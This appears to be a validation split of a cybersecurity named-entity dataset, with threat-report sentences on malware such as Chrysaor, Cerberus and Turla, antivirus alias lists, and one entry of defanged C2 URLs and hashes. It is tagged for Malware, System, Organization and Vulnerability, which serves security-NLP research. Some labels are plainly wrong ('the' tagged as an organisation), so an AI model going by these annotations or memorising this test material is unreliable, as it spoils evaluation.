{"text": "UPS Ship Notification, Tracking Number digits and Acknowledgement TBO-..-digits as subjects.", "spans": {}, "info": {"id": "cyner2_valid_000213", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Small.36864.BEK Trojan.Win32.Bohu!O Trojan.Bohu Bohu.dll Dropper.Bohu.Win32.1 Trojan/Dropper.Bohu.a TROJ_GORIADU.SMY Win32.Trojan.WisdomEyes.16070401.9500.9998 TROJ_GORIADU.SMY Win.Trojan.Bohu-7 Trojan.Win32.Bohu.a Trojan.Win32.BackdrDN.dcbln Trojan.Win32.A.Bohu.35840 Trojan.Goriadu Bohu.dll Trojan/Bohu.a W32.Trojan.Orsam Trojan/Win32.Bohu Trojan.Zusy.D5FA Trojan.Win32.Bohu.a Trojan/Win32.Goriadu.R15018 TrojanDropper.Bohu Win32/TrojanDropper.Bohu.A Trojan.Win32.Bohu.aab Trojan.DR.Bohu!0vTQVrN4gRk Trojan.Win32.Siglow.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000214", "source": "cyner2_valid"}}
{"text": "Once Chrysaor is installed , a remote operator is able to surveil the victim 's activities on the device and within the vicinity , leveraging microphone , camera , data collection , and logging and tracking application activities on communication apps such as phone and SMS .", "spans": {"Malware: Chrysaor": [[5, 13]]}, "info": {"id": "cyner2_valid_000215", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.HfsIemusi.715E Backdoor.Win32.Hupigon!O Backdoor.Hupigon.dkxa.n2 Backdoor/Hupigon.dkxa Backdoor.Hupigon!sk7FJKqXwDM W32/Backdoor2.CMTX Trojan.Win32.Hupigon.juni Backdoor.Win32.Hupigon.2794496[h] BackDoor.Pigeon.38533 Backdoor.Hupigon.Win32.18917 Backdoor/PcClient.nuv TR/Packed.11704 Trojan[Backdoor]/Win32.Hupigon Trojan.Heur.JP.QkuaaWzcbLmb Win-Trojan/Hupigon.2794496 Backdoor:Win32/Remoab.B Backdoor.Hupigon Trojan-Spy.Banker", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000216", "source": "cyner2_valid"}}
{"text": "Command and control API calls ViperRAT samples are capable of communicating to C2 servers through an exposed API as well as websockets .", "spans": {"Malware: ViperRAT": [[30, 38]]}, "info": {"id": "cyner2_valid_000218", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9868 Trojan.Win32.APosT.ey Trojan.Win32.JBFM5730.dztwsc DLOADER.Trojan BehavesLike.Win32.PUPXAB.jm Trojan.Win32.APosT.ey W32/APosT.EY!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000219", "source": "cyner2_valid"}}
{"text": "This attack leverages PowerShell, a Windows scripting language, to execute commands and remain persistent on the host machines.", "spans": {"System: PowerShell,": [[22, 33]], "System: Windows": [[36, 43]], "System: host machines.": [[113, 127]]}, "info": {"id": "cyner2_valid_000220", "source": "cyner2_valid"}}
{"text": "The trojan, dubbed Trojan.AndroidOS.Switcher, performs a brute-force password guessing attack on the router's admin web interface.", "spans": {"Malware: trojan,": [[4, 11]], "System: router's admin web interface.": [[101, 130]]}, "info": {"id": "cyner2_valid_000221", "source": "cyner2_valid"}}
{"text": "HummingWhale has also been observed hiding the original malicious app once it 's installed and trying to improve its Google Play reputation by automatically generating posts disguised as positive user comments and ratings .", "spans": {"Malware: HummingWhale": [[0, 12]], "System: Google Play": [[117, 128]]}, "info": {"id": "cyner2_valid_000222", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Dropper/W32.Injector.275968.B TrojanDropper.Injector Dropper.Injector.Win32.69255 Trojan/Turla.ai TROJ_TURLA.YLF Win.Trojan.Pfinet-1 Win32.Trojan-Dropper.Injector.BG Trojan-Dropper.Win32.Injector.kkkc Trojan.Win32.Inject.ddwwnm Troj.Dropper.W32.Injector!c Trojan.DownLoader11.27456 TROJ_TURLA.YLF BehavesLike.Win32.BrowseFox.dh W32/Trojan.JAZX-6590 TrojanDropper.Injector.atwe BDS/Pfinet.A.1 Trojan/Win32.Epiccosplay Trojan-Dropper.Win32.Injector.kkkc Backdoor:Win32/Pfinet.A!dha TrojanDropper.Injector Trj/Chgt.C Trojan.DR.Injector!Tx5iQYbcsFA Trojan-Dropper.Win32.Injector W32/Injector.KKKC!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000223", "source": "cyner2_valid"}}
{"text": "URL: hxxp:// alex-luthor.", "spans": {}, "info": {"id": "cyner2_valid_000224", "source": "cyner2_valid"}}
{"text": "We were also able to analyze some GolfSpy samples sourced from the Trend Micro mobile app reputation service .", "spans": {"Malware: GolfSpy": [[34, 41]], "Organization: Trend Micro": [[67, 78]]}, "info": {"id": "cyner2_valid_000225", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Vivael.A@mm Email-Worm.Win32.Colevo!O Worm.Meve W32/Colevo.a@MM Win32.Worm.Unp.e W32/EmailWorm.NAS W32.Vivael@mm Win32/Colevo.B Win32.Vivael.A@mm Email-Worm.Win32.Colevo.a Win32.Vivael.A@mm Trojan.Win32.Colevo.emgs Email.Worm.W32!c Worm.Win32.Colevo.A.unp Win32.Vivael.A@mm Win32.HLLM.Colevo.1 Worm.Colevo.Win32.6 W32/Colevo.a@MM Trojan-Downloader.Win32.Banload W32/Worm.ACFJ-5033 I-Worm/Colevo.a Worm[Email]/Win32.Colevo Worm:Win32/Meve.A@mm Win32.Vivael.E90817 Email-Worm.Win32.Colevo.a Worm.Colevo Win32.Vivael.A@mm Win32.Vivael.A@mm Trj/CI.A Win32/Colevo.A.unp Win32.Worm-email.Colevo.Hssl W32/Colevo.A@mm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000226", "source": "cyner2_valid"}}
{"text": "The Android developer documentation describes the accessibility event class as a class that \" represents accessibility events that are seen by the system when something notable happens in the user interface .", "spans": {"System: Android": [[4, 11]]}, "info": {"id": "cyner2_valid_000227", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor-DWV.a Dropper.Droco.Win32.123 Packer.W32.Krap.bh!c Trojan/Dropper.Droco.a Trojan.Graftor.D46BC TROJ_WEVARM.SM Backdoor.Trojan TROJ_WEVARM.SM Packed.Win32.Krap.bh Trojan.Win32.Krap.dxousm Spyware.Droco.Dr.20992.K TrojWare.Win32.TrojanDropper.Droco.A BackDoor.IRC.Sdbot.18753 BehavesLike.Win32.Sytro.mm TrojanDropper.Droco.a Trojan[Packed]/Win32.Krap TrojanDropper:Win32/Droco.A Packed.Win32.Krap.bh", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000228", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Warood Backdoor.Win32.Warood Backdoor:Win32/Warood.B", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000229", "source": "cyner2_valid"}}
{"text": "Indicators of compromise ( IOC ) URLs hxxp : //5.9.33.226:5416 hxxp : //172.110.10.171:85/testcc.php hxxp : //sub1.tdsworker.ru:5555/3ds/ Hash values Package.apk - A342a16082ea53d101f556b50532651cd3e3fdc7d9e0be3aa136680ad9c6a69f eCommon.dl - 604deb75eedf439766896f05799752de268baf437bf89a7185540627ab4a4bd1 Reznov.dll - 17b8665cdbbb94482ca970a754d11d6e29c46af6390a2d8e8193d8d6a527dec3 Custom activity prefix com.cact.CAct Cerberus - A new banking Trojan from the underworld August 2019 In June 2019 , ThreatFabric analysts found a new Android malware , dubbed “ Cerberus ” , being rented out on underground forums .", "spans": {"Malware: Cerberus": [[422, 430], [562, 570]], "Organization: ThreatFabric": [[501, 513]], "System: Android": [[535, 542]]}, "info": {"id": "cyner2_valid_000230", "source": "cyner2_valid"}}
{"text": "Linux.Mirai is a malware designed to hijack busybox systems in order to perform DDoS attacks.", "spans": {"Malware: malware": [[17, 24]], "System: busybox systems": [[44, 59]]}, "info": {"id": "cyner2_valid_000231", "source": "cyner2_valid"}}
{"text": "All of these apps are developed by the same framework and hence have the same package name and certificate information as seen in Figure 12. certificate Figure 12 : Package name and certificate information .", "spans": {}, "info": {"id": "cyner2_valid_000232", "source": "cyner2_valid"}}
{"text": "rootdaemon will first attempt to jailbreak the device using a modified version of the DirtyCow exploit .", "spans": {"Vulnerability: DirtyCow exploit": [[86, 102]]}, "info": {"id": "cyner2_valid_000234", "source": "cyner2_valid"}}
{"text": "Later, the attackers set up two fake websites pretending to be a University of Oxford conference sign-up page and a job application website.", "spans": {"Organization: University of Oxford": [[65, 85]]}, "info": {"id": "cyner2_valid_000236", "source": "cyner2_valid"}}
{"text": "Much of the information being stolen appear to be military-related .", "spans": {}, "info": {"id": "cyner2_valid_000237", "source": "cyner2_valid"}}
{"text": "For example , this is how opcode 0x1A is implemented : The opcode should represent a JB ( Jump if below ) function , but it ’ s implemented through set carry ( STC ) instruction followed by a JMP into the dispatcher code that will verify the carry flag condition set by STC .", "spans": {}, "info": {"id": "cyner2_valid_000238", "source": "cyner2_valid"}}
{"text": "In doing so , the Trojan can be sure that its malicious module will be executed with system rights .", "spans": {}, "info": {"id": "cyner2_valid_000240", "source": "cyner2_valid"}}
{"text": "However, Retefe is still being distributed in recent spam campaigns, targeting Swiss Internet users.", "spans": {"Malware: Retefe": [[9, 15]], "Organization: Swiss Internet users.": [[79, 100]]}, "info": {"id": "cyner2_valid_000241", "source": "cyner2_valid"}}
{"text": "Based on the way the campaign has developed, it won't be surprising to see additional evolutions from ChessMaster in the future.", "spans": {}, "info": {"id": "cyner2_valid_000242", "source": "cyner2_valid"}}
{"text": "In these campaigns, Pawn Storm used a previously unknown zero-day in Adobe's Flash CVE-2016-7855, fixed on October 26, 2016 with an emergency update in combination with a privilege escalation in Microsoft's Windows Operating System CVE-2016-7255 that was fixed on November 8, 2016.", "spans": {"Vulnerability: unknown zero-day": [[49, 65]], "System: Adobe's Flash": [[69, 82]], "Vulnerability: privilege escalation": [[171, 191]], "System: Microsoft's Windows Operating System": [[195, 231]]}, "info": {"id": "cyner2_valid_000243", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Ransom.Crowti.A6 Spyware.Boaxxe Trojan.Injector.Win32.564600 Trojan.Symmi.D10640 Win32.Trojan.Kryptik.jm W32/Trojan.ITLI-7905 BehavesLike.Win32.VirRansom.cc Trojan.PSW.Fareit.fnz Trojan[Ransom]/Win32.Scatter Ransom:Win32/Vaultcrypt.A Trojan/Win32.Miuref.C1508943 TrojanPSW.Fareit Trj/RansomCrypt.E Trojan.Win32.Injector W32/Injector.DDEC!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000244", "source": "cyner2_valid"}}
{"text": "Verify Apps : Ensure Verify Apps is enabled .", "spans": {}, "info": {"id": "cyner2_valid_000245", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.eHeur.Malware03 Trojan.Boaxxe.E Trojan/Dropper.Injector.corb Win32.Trojan.WisdomEyes.16070401.9500.9996 Ransom_Reveton.R00EC0DB518 Packed.Win32.Krap.iu TrojWare.Win32.Kazy.FOF Trojan.Inject.64356 Dropper.Injector.Win32.14781 Ransom_Reveton.R00EC0DB518 BehavesLike.Win32.Dropper.wz Trojan.Crypt Trojan[Packed]/Win32.Krap Win32.Troj.Injector.kcloud Trojan.Boigy.1 Packed.Win32.Krap.iu Ransom:Win32/Reveton.A Spyware/Win32.Carberp.R25061 TrojanDropper.Injector Bck/Qbot.AO Trojan.Kryptik!7eMffExEPUI", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000246", "source": "cyner2_valid"}}
{"text": "Also known as BaneChant MM Core is a file-less APT which is executed in memory by a downloader component.", "spans": {"Malware: BaneChant": [[14, 23]], "Malware: MM Core": [[24, 31]], "Malware: downloader component.": [[84, 105]]}, "info": {"id": "cyner2_valid_000247", "source": "cyner2_valid"}}
{"text": "The dotted arrows represent the use of a particular C2 server by a specific app to send information and fetch instructions .", "spans": {}, "info": {"id": "cyner2_valid_000248", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: WS.Reputation.1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000249", "source": "cyner2_valid"}}
{"text": "In the case of FinFisher , however , we could not find a good existing interactive disassembler ( IDA ) plugin that can normalize the code flow .", "spans": {"Malware: FinFisher": [[15, 24]]}, "info": {"id": "cyner2_valid_000250", "source": "cyner2_valid"}}
{"text": "mike.jar implements most of the data collection and exfiltration capabilities of this spyware .", "spans": {}, "info": {"id": "cyner2_valid_000251", "source": "cyner2_valid"}}
{"text": "After some major upgrade , by mid-June , the “ Agent Smith ” campaign reached its peak .", "spans": {"Malware: Agent Smith": [[47, 58]]}, "info": {"id": "cyner2_valid_000252", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.FlyStudio!O3t91C2ADog Trojan.Adclicker W32/DLoader.AHYXT TROJ_ADCLIK.SM TrojWare.Win32.FlyStudio.~UJ TR/FlyStudio.QI.40 TROJ_ADCLIK.SM Riskware.RiskTool.Win32.HideProc!IK Trojan/FlyStudio.aar Trojan:Win32/Geshab.A Trojan.Adclicker!rem not-a-virus:RiskTool.Win32.HideProc", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000254", "source": "cyner2_valid"}}
{"text": "This vulnerability could also be exploited using other Office file formats.", "spans": {"Vulnerability: vulnerability": [[5, 18]], "Vulnerability: exploited": [[33, 42]]}, "info": {"id": "cyner2_valid_000256", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HW32.Packed.2FFC Backdoor/W32.Matsnu.596864 Trojan.Silcon.C4 Backdoor.Matsnu.Win32.749 Backdoor.W32.Matsnu!c Trojan.Razy.D9CF4 Win32.Trojan.WisdomEyes.16070401.9500.9979 TROJ_NYMAIM.SMA Backdoor.Win32.Matsnu.fir Trojan.Win32.Inject.eboqsu Trojan.Win32.Z.Matsnu.596864 Trojan.Inject2.19810 TROJ_NYMAIM.SMA W32/Trojan.VBQR-6623 Backdoor.Matsnu.kz TR/Crypt.ZPACK.smooz Trojan[Backdoor]/Win32.Matsnu Backdoor.Win32.Matsnu.fir Backdoor/Win32.Matsnu.R178662 Win32.Backdoor.Matsnu.Hoos Trojan.Win32.Injector Win32/Trojan.29d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000257", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Androm.A5 Backdoor.Androm.Win32.42730 TROJ_LETHIC.SMT Trojan.Win32.Waldek.eovykd Virus.Win32.Virut.ua BackDoor.IRC.NgrBot.1034 TROJ_LETHIC.SMT BehavesLike.Win32.Trojan.fh Win32/Virut.bv Trojan/Win32.Waldek Trojan:Win32/Qadars.C!bit Trojan.Zusy.D39FAB Backdoor.Androm Trojan.Waldek Win32/Virut.NBP P2P-Worm.Win32.Palevo Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000258", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.eHeur.Malware08 TROJ_VENIK_GJ1000AE.UVPM TROJ_VENIK_GJ1000AE.UVPM BackDoor.FengSpy.33 BehavesLike.Win32.Dropper.lm Packed.Win32.PePatch TR/Graftor.80057.2 Trojan.Zusy.DB9CF TrojanDropper:Win32/Venik.B Trj/Dtcontx.I", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000259", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Bagle.FS@mm Win32.Bagle.FS@mm Trojan/Downloader.Bagle.y Trojan.DL.Bagle.JX W32/Mitglieder.TO Trojan.Lodeight.C Mitglied.YI Win32/Lumebag.H TROJ_BAGLE.ACL Worm.Bagle-58 Trojan-Downloader.Win32.Bagle.y Win32.Bagle.FS@mm Trojan.Win32.Bagle.himc Virus.Win32.Heur.c Worm.Win32.Bagle.GS Win32.Bagle.FS@mm Win32.HLLM.Beagle.35306 TROJ_BAGLE.ACL TrojanDownloader.BBEagle.ag Win32.TrojDownloader.Beagle.y.kcloud TrojanDownloader:Win32/Bagle.BA Trojan.Win32.Downloader-Bagle.35306 Win32.Bagle.FS@mm W32/Mitglieder.MHFM-7641 Worm/Win32.Bagle MalwareScope.Trojan-PSW.Pinch.1 Trojan.Lodeight Win32/Bagle.GS Trojan.DL.Bagle.em Trojan-Downloader.Win32.Bagle.Y W32/Bagle.KP!tr.dldr W32/Informer.A.worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000260", "source": "cyner2_valid"}}
{"text": "This gist contains brief details of additional Paranoid PlugX files, likely associated with a sophisticated attacker.", "spans": {"Malware: Paranoid PlugX": [[47, 61]]}, "info": {"id": "cyner2_valid_000261", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: PSWTool.Win32.NetPass!O HackTool.Mailpassview Tool.NetPass.Win32.134 W32/Meredrop.ABY Win32/Droplet.BH TROJ_NETPASS_0000006.TOMA Win.Trojan.Dialupass-19 Riskware.Win32.NetPass.wdjc Trojan.Inject.5198 AdWare/NetPass.a TR/PSW.Stealer.H Trojan[Dropper]/Win32.Injector.meun PWS:Win32/Wedsnot.A Trojan.Dropper.78 Trojan.Meredrop!8s1wx4pKREA Trojan-PWS.Stealer.H", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000262", "source": "cyner2_valid"}}
{"text": "Fortinet We start our correlation with the analysis of the exploit payload - a remote administration tool RAT with MD5 6bde5462f45a230edc7e7641dd711505 detected as MSIL/Agent.QOO!tr.", "spans": {"Organization: Fortinet": [[0, 8]], "Malware: exploit payload": [[59, 74]], "Malware: a remote administration tool RAT": [[77, 109]]}, "info": {"id": "cyner2_valid_000263", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W2KM_FAREITDRPR.ZJCH-A1 Troj.Downloader.Msword!c W97M.MulDrop.63 W2KM_FAREITDRPR.ZJCH-A1 W97M/Dropper.q W2000M/Downloader.C HEUR.VBA.Trojan.d W97M/Dropper.q Win32/Virus.Downloader.947", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000264", "source": "cyner2_valid"}}
{"text": "Typically, malicious Word documents that are sent as attachments to phishing emails will themselves contain a script or macro that executes malicious code.", "spans": {"Malware: macro": [[120, 125]], "Malware: malicious code.": [[140, 155]]}, "info": {"id": "cyner2_valid_000265", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.OnLineGames.brtky PWS:Win32/Pebox.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000266", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9600 W32/Backdoor2.HTKJ Backdoor.Miancha Backdoor.Win32.Miancha.a Trojan.Win32.Miancha.csunga Win32.Backdoor.Miancha.Gvn W32/Backdoor.QNKK-3506 BDS/Miancha.A Trojan[Backdoor]/Win32.Miancha Backdoor:Win32/Miancha.A Backdoor.W32.Miancha.a!c Backdoor.Win32.Miancha.a Backdoor.Miancha! Win32/Trojan.708", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000267", "source": "cyner2_valid"}}
{"text": "On a lazy Sunday morning we got a message from one of our Polish readers about a strange behavior of his home router.", "spans": {}, "info": {"id": "cyner2_valid_000268", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Turla.D Trojan/W32.Nus.210944 Backdoor.Turla Trojan.Turla.Win32.21 Win32.Turla.D Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Turla BKDR_TURLA.SM Win32.Rootkit.Uroburos.B Rootkit.Win32.Turla.o Win32.Turla.D Trojan.Win32.Turla.cwxmwa Win32.Turla.D Backdoor:W32/Turla.A BackDoor.Turla.15 Rootkit.Win32.Turla Rookit.Turla.a BDS/Turla.A.2 Trojan/Win32.Nus Trojan/Win32.Turla.C285799 Rootkit.Win32.Turla.o Backdoor:WinNT/Turla.A!dha Win32.Turla.D Rootkit.Turla Win32.Rootkit.Turla.Efkj W32/BackDoor.1WJ!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000269", "source": "cyner2_valid"}}
{"text": "Once launched , null will first verify whether it is able to fork on the system and that there is no other instance of itself currently running by checking whether the local port number 6842 is available .", "spans": {}, "info": {"id": "cyner2_valid_000270", "source": "cyner2_valid"}}
{"text": "Working with U.S. and international partners, DHS and FBI identified victims in these sectors.", "spans": {"Organization: U.S.": [[13, 17]], "Organization: international partners, DHS": [[22, 49]], "Organization: FBI": [[54, 57]], "Organization: sectors.": [[86, 94]]}, "info": {"id": "cyner2_valid_000271", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Bloodhound.HLP.1 HEUR_HLPDYN.T EXP/HlpDrop.B Trojan:Win32/HlpDrop.A Win32/Trojan.Exploit.919", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000272", "source": "cyner2_valid"}}
{"text": "During this stage , the loader may also call a certain API using native system calls , which is another way to bypass breakpoints on API and security solutions using hooks .", "spans": {}, "info": {"id": "cyner2_valid_000273", "source": "cyner2_valid"}}
{"text": "Intel Security has recently seen a new kind of ransomware–Zcrypt—that can self-replicate.", "spans": {"Organization: Intel Security": [[0, 14]], "Malware: ransomware–Zcrypt—that": [[47, 69]]}, "info": {"id": "cyner2_valid_000274", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.HfsAutoB.1919 Backdoor/W32.RMFdoor.229438 Backdoor.Win32.A.RMFdoor.229438 Backdoor.Win32.RMFdoor.10 Win32.Hack.RMFdoor.kcloud Trojan.Heur.GM.04081640A0 Trojan/Win32.Hacktack.R134105 Win32/RMFdoor.10 Win32.Trojan.Rmfdoor.Pdmq", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000275", "source": "cyner2_valid"}}
{"text": "As Brian Krebs wrote in one of his recent post, Philadelphia is a ransomware-as-a-service crime ware package that is sold for roughly $400 to would-be cyber criminals who dream of carving out their own ransomware empires.", "spans": {"Organization: Brian Krebs": [[3, 14]], "Malware: Philadelphia": [[48, 60]], "Malware: ransomware-as-a-service crime ware package": [[66, 108]], "Malware: ransomware": [[202, 212]]}, "info": {"id": "cyner2_valid_000276", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Pled BKDR_PLEAD.ZTCC-A Trojan.Win32.Dwn.djqjgz Trojan.DownLoader11.48076 BKDR_PLEAD.ZTCC-A W32/Trojan.MQWA-4490 TR/AD.Bluether.hsuud Trojan:Win32/Bluether.B!dha Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000277", "source": "cyner2_valid"}}
{"text": "As a result , due to such an unusual compilation process , there were signs in the dex file that point to dexlib , a library used by the Smali tool to assemble dex files .", "spans": {}, "info": {"id": "cyner2_valid_000278", "source": "cyner2_valid"}}
{"text": "So far the damage does not seem as wide spread as WannaCry or NotPetya.", "spans": {"Malware: WannaCry": [[50, 58]], "Malware: NotPetya.": [[62, 71]]}, "info": {"id": "cyner2_valid_000279", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HackTool.Win32.Sniffer.WpePro!O Hacktool.Wpepro Win32.Trojan.WpePro.a W32/Trojan.UOTN-4107 Win.Trojan.Sniffer-1 HackTool.Win32.Sniffer.WpePro.uud Trojan.Win32.MLW.bobug HackTool.W32.Sniffer.WpePro.l4ik Win32.Hacktool.Sniffer.Dbg Program.Wpe.632 Tool.Sniffer.Win32.6 HackTool.Win32.Sniffer.WpePro W32/Trojan2.JZBH HackTool/Sniffer.ik SPR/Sniffer.Wpe.a.1 HackTool/Win32.WpePro.rxi Trojan.Win32.Z.Sniffer.2084864 HackTool.Win32.Sniffer.WpePro.uud Trojan/Win32.HDC.C161182 HackTool.Samples Trj/CI.A Win32/Trojan.Hacktool.3bb", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000280", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Dynamer.28147 Backdoor.Win32.Wonknu.a Trojan.Win32.Ocna.edtwqs Backdoor:W32/Wonknu.A Backdoor.Wonknu.a Trojan[Backdoor]/Win32.Wonknu Backdoor.Win32.Wonknu.a Backdoor:Win32/Jadow.A Trojan/Win32.Jadow.R172147 Trj/GdSda.A Win32.Backdoor.Wonknu.Phzv Win32/Trojan.ffd", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000281", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Buffyx Backdoor.Kingslayer.Win32.2 Backdoor.Win32.Kingslayer.b Trojan.Win32.Kingslayer.emzhez TR/AD.BuffyX.lfbzh Trojan[Backdoor]/Win32.Kingslayer Backdoor.Win32.Kingslayer.b Backdoor.Kingslayer Win32.Backdoor.Kingslayer.Lkxo", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000282", "source": "cyner2_valid"}}
{"text": "The possibility of cyberattacks was discovered in June this year, and there are fears that information may have been stolen from the computer terminal of a researcher at the university s Hydrogen Isotope Research Center.", "spans": {"Organization: researcher": [[156, 166]], "Organization: the": [[170, 173]]}, "info": {"id": "cyner2_valid_000283", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojandropper.Facido Trojan.FakeMS Trojan.Win32.Zusy.exkrtq BehavesLike.Win32.MultiPlug.bc TR/Crypt.ZPACK.gygzk Trojan.Zusy.D3EA88 TrojanDropper:Win32/Facido.A!bit Trj/GdSda.A Win32.Trojan.Zusy.Hwwm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000284", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Script.CLF Trojan/Dropper.Dapato.slg Win32/Jorik.KJ Trojan.Win32.Bicololo.azue Trojan.Script.CLF Trojan.Url.Iframe.ehmbbx Trojan:W32/Qhost.WE W32/Mdrop.FZY!tr Trojan:Win32/Puawn.A Trojan.Script.CLF Trojan.Win32.Bicololo.azue Trojan.Script.CLF Trojan/Win32.Qhost.C409857 Trojan.Bicololo Win32/Bicololo.FN Win32.Trojan.Bicololo.Anpx Trojan.Bicololo!p6ap5ydo3To Trojan.Win32.Bicololo Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000285", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HW32.Packed.144B TSPY_ANOBRANK.SM1 Win32.Trojan.WisdomEyes.16070401.9500.9986 TSPY_ANOBRANK.SM1 Trojan.Win32.Mlw.ewwkni BehavesLike.Win32.Miuref.tc TR/Crypt.Xpack.sgdtn Trojan.Symmi.D13D25 Trojan/Win32.Black.C2087185", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000289", "source": "cyner2_valid"}}
{"text": "It is clear that this RAT is under intense development , however , the addition and removal of packages , along with the huge quantity of unused code and usage of deprecated and old techniques denotes an amateur development methodology .", "spans": {}, "info": {"id": "cyner2_valid_000292", "source": "cyner2_valid"}}
{"text": "Earlier this year , we discovered apps hiding a JAR in the data section of an ELF file which it then dynamically loads using DexClassLoader .", "spans": {}, "info": {"id": "cyner2_valid_000293", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Multi Win32.Trojan.WisdomEyes.16070401.9500.9667 Trojan-Downloader.Win32.PsDownload.apf Trojan-Dropper.MSIL.Binder TR/Dropper.MSIL.muysl Uds.Dangerousobject.Multi!c Trojan-Downloader.Win32.PsDownload.apf TrojanDownloader:PowerShell/Ploprolo.F Trj/GdSda.A Win32.Trojan-downloader.Psdownload.Alik MSIL/TrojanDropper.AFR!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000294", "source": "cyner2_valid"}}
{"text": "It also harvests call details and SMS logs as shown below .", "spans": {}, "info": {"id": "cyner2_valid_000295", "source": "cyner2_valid"}}
{"text": "Malware , phishing , and other threats detected by Microsoft Defender for Endpoint are reported to the Microsoft Defender Security Center , allowing SecOps to investigate mobile threats along with endpoint signals from Windows and other platforms using Microsoft Defender for Endpoint ’ s rich set of tools for detection , investigation , and response .", "spans": {"System: Microsoft Defender": [[51, 69], [253, 271]], "Organization: Microsoft Defender Security Center": [[103, 137]], "System: Windows": [[219, 226]]}, "info": {"id": "cyner2_valid_000296", "source": "cyner2_valid"}}
{"text": "Once infected, the victim machine can be controlled by the attacker to perform basic remote-access trojan-like tasks including command execution and file upload and download.", "spans": {"System: victim machine": [[19, 33]], "Malware: remote-access trojan-like": [[85, 110]]}, "info": {"id": "cyner2_valid_000297", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/CoinMiner.s Win32.Trojan.WisdomEyes.16070401.9500.9995 PUA.Bitcoinminer Trojan.Win32.Mlw.dccbnk Trojan.Win32.Z.Coinminer.109056 Trojan.DownLoad.64603 BehavesLike.Win32.Trojan.ch Trojan-PSW.ILUSpy TrojanDropper.Dapato.gtv TrojanDownloader:MSIL/Downcoin.B Troj.Ransom.W32!c RiskWare.BitCoinMiner Win32/Trojan.Ransom.793", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000298", "source": "cyner2_valid"}}
